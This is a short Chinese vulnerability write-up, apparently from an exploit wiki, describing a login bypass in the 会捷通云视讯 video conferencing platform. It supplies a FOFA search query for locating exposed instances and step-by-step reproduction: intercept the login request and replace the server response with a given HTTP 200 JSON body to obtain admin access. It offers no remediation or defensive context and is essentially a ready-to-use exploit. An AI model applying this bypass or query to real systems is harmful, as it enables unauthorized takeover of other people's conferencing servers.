# 会捷通云视讯 登录绕过漏洞

## 漏洞描述

会捷通云视讯存在登陆绕过漏洞，通过拦截特定的请求包并修改即可获取后台权限

## 漏洞影响

> [!NOTE]
>
> 会捷通云视讯

## FOFA

> [!NOTE]
>
> body="/him/api/rest/v1.0/node/role"

## 漏洞复现

登陆页面如下

![](http://wikioss.peiqi.tech/vuln/zc-1.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

输入任意账号密码抓包

![](http://wikioss.peiqi.tech/vuln/zc-5.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

修改返回包为如下后放包则成功绕过登录

```
HTTP/1.1 200 
Server: Hsengine/1.4.1
Date: Mon, 17 May 2021 16:13:43 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Length: 61

{"token":null,"result":null}
```

![](http://wikioss.peiqi.tech/vuln/zc-7.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)